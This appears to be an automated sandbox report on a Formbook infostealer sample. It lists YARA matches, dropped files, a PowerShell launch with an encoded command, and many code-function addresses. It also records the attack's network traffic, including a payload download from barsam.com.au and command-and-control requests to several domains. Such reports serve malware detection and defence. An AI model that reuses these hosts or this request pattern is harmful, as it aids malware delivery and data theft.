59 35 6e 72 78 57 74 55 45 79 66 46 2d 71 37 32 65 50 75 66 39 35 48 34 51 7e 47 45 37 66 4b 78 76 42 78 4c 44 52 45 77 41 62 5f 69 2d 7e 62 37 30 38 57 6a 78 5a 2d 78 4a 59 6b 33 44 48 64 38 49 4a 67 6a 42 4d 4f 35 49 56 37 4c 48 79 37 4c 34 30 4a 67 42 50 7a 34 4f 53 43 77 33 58 73 66 73 56 75 58 67 50 4a 43 2d 69 76 30 31 63 68 62 34 54 62 77 58 49 59 6b 5f 6e 67 34 38 69 65 73 41 39 58 57 78 76 36 6e 58 70 30 62 45 32 59 4f 72 7a 58 62 56 56 77 66 59 6a 68 45 6d 33 54 6b 77 4f 66 31 45 72 79 56 38 7e 4b 54 44 5a 79 42 6c 6a 43 66 65 77 5a 50 4a 35 5a 34 65 39 6c 78 42 75 43 48 61 62 55 56 33 56 74 65 4c 76 64 55 61 63 47 41 4c 42 39 63 63 75 46 63 2d 63 5a 74 69 6a 79 4b 61 66 49 31 73 4b 39 30 71 69 78 75 46 5a 69 74 5f 33 53 55 4f 6b 4f 77 38 30 42 71 30 61 49 72 58 77 4e 75 4a 34 56 56 2d 37 4f 47 51 7a 30 4c 35 50 71 39 4d 47 6e 4f 69 58 49 61 75 56 4a 67 36 79 32 46 33 49 4f 77 41 41
Source: unknown DNS traffic detected: queries for: barsam.com.au
Source: global traffic HTTP traffic detected: GET /bin_FCWtLoO90.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrv.ini
Source: C:\Program Files\Mozilla Firefox\firefox.exe Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrf.ini
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 16636
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F19000 13_2_04F19000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F1E7EF 13_2_04F1E7EF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F18FF2 13_2_04F18FF2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F18FA8 13_2_04F18FA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F1E820 13_2_04F1E820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0835E830 13_2_0835E830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08356A50 13_2_08356A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08356A50 13_2_08356A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08355430 13_2_08355430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0836EC40 13_2_0836EC40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08367358 13_2_08367358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2EE8 27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FF63 27_2_1F08FF63
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF0E50 27_2_1EFF0E50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08EFBF 27_2_1F08EFBF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F081FC6 27_2_1F081FC6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD6FE0 27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F012E48 27_2_1F012E48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F070E6D 27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F080EAD 27_2_1F080EAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F089ED2 27_2_1F089ED2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDCF00 27_2_1EFDCF00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEFCE0 27_2_1EFEFCE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE8CDF 27_2_1EFE8CDF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FD27 27_2_1F08FD27
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F087D4C 27_2_1F087D4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD3C60 27_2_1EFD3C60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC0C12 27_2_1EFC0C12
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F06FDF4 27_2_1F06FDF4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F04EC20 27_2_1F04EC20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD9DD0 27_2_1EFD9DD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07EC4C 27_2_1F07EC4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE2DB0 27_2_1EFE2DB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F086C69 27_2_1F086C69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08EC60 27_2_1F08EC60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0D69 27_2_1EFD0D69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F069C98 27_2_1F069C98
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F09ACEB 27_2_1F09ACEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F057CE8 27_2_1F057CE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAD00 27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F00DB19 27_2_1F00DB19
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FB2E 27_2_1F08FB2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEFAA0 27_2_1EFEFAA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F044BC0 27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08CA13 27_2_1F08CA13
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08EA5B 27_2_1F08EA5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FA89 27_2_1F08FA89
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0B10 27_2_1EFD0B10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD28C0 27_2_1EFD28C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE6882 27_2_1EFE6882
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD9870 27_2_1EFD9870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEB870 27_2_1EFEB870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFB6868 27_2_1EFB6868
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08E9A6 27_2_1F08E9A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0159C0 27_2_1F0159C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFE810 27_2_1EFFE810
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD3800 27_2_1EFD3800
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F070835 27_2_1F070835
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCE9A0 27_2_1EFCE9A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F045870 27_2_1F045870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F872 27_2_1F08F872
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0498B2 27_2_1F0498B2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0818DA 27_2_1F0818DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0878F3 27_2_1F0878F3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCC6E0 27_2_1EFCC6E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F086757 27_2_1F086757
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0680 27_2_1EFD0680
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF4670 27_2_1EFF4670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEC600 27_2_1EFEC600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F06D62C 27_2_1F06D62C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07D646 27_2_1F07D646
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD2760 27_2_1EFD2760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDA760 27_2_1EFDA760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08A6C0 27_2_1F08A6C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0436EC 27_2_1F0436EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F6F6 27_2_1F08F6F6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F09A526 27_2_1F09A526
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0445 27_2_1EFD0445
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F5C9 27_2_1F08F5C9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0875C6 27_2_1F0875C6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03D480 27_2_1F03D480
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBD2EC 27_2_1EFBD2EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F330 27_2_1F08F330
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08124C 27_2_1F08124C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC1380 27_2_1EFC1380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDE310 27_2_1EFDE310
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F09010E 27_2_1F09010E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDB0D0 27_2_1EFDB0D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F06D130 27_2_1F06D130
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC00A0 27_2_1EFC00A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEB1E0 27_2_1EFEB1E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD51C0 27_2_1EFD51C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07E076 27_2_1F07E076
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F00508C 27_2_1F00508C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBF113 27_2_1EFBF113
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0870F1 27_2_1F0870F1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050BA526 32_2_050BA526
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0445 32_2_04FF0445
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF5C9 32_2_050AF5C9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A75C6 32_2_050A75C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0505D480 32_2_0505D480
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FEC6E0 32_2_04FEC6E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A6757 32_2_050A6757
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0680 32_2_04FF0680
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500C600 32_2_0500C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0508D62C 32_2_0508D62C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0509D646 32_2_0509D646
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05014670 32_2_05014670
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF2760 32_2_04FF2760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFA760 32_2_04FFA760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AA6C0 32_2_050AA6C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050636EC 32_2_050636EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF6F6 32_2_050AF6F6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050B010E 32_2_050B010E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFB0D0 32_2_04FFB0D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0508D130 32_2_0508D130
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE00A0 32_2_04FE00A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500B1E0 32_2_0500B1E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF51C0 32_2_04FF51C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0509E076 32_2_0509E076
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0502508C 32_2_0502508C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FDF113 32_2_04FDF113
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A70F1 32_2_050A70F1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FDD2EC 32_2_04FDD2EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF330 32_2_050AF330
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A124C 32_2_050A124C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE1380 32_2_04FE1380
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFE310 32_2_04FFE310
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFD27 32_2_050AFD27
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A7D4C 32_2_050A7D4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF3C60 32_2_04FF3C60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05002DB0 32_2_05002DB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE0C12 32_2_04FE0C12
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0508FDF4 32_2_0508FDF4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF9DD0 32_2_04FF9DD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0509EC4C 32_2_0509EC4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A6C69 32_2_050A6C69
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AEC60 32_2_050AEC60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05089C98 32_2_05089C98
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0D69 32_2_04FF0D69
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05008CDF 32_2_05008CDF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500FCE0 32_2_0500FCE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050BACEB 32_2_050BACEB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FEAD00 32_2_04FEAD00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE2EE8 32_2_04FE2EE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF1EB2 32_2_04FF1EB2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFF63 32_2_050AFF63
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AEFBF 32_2_050AEFBF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A1FC6 32_2_050A1FC6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF6FE0 32_2_04FF6FE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05032E48 32_2_05032E48
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05010E50 32_2_05010E50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05090E6D 32_2_05090E6D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A0EAD 32_2_050A0EAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A9ED2 32_2_050A9ED2
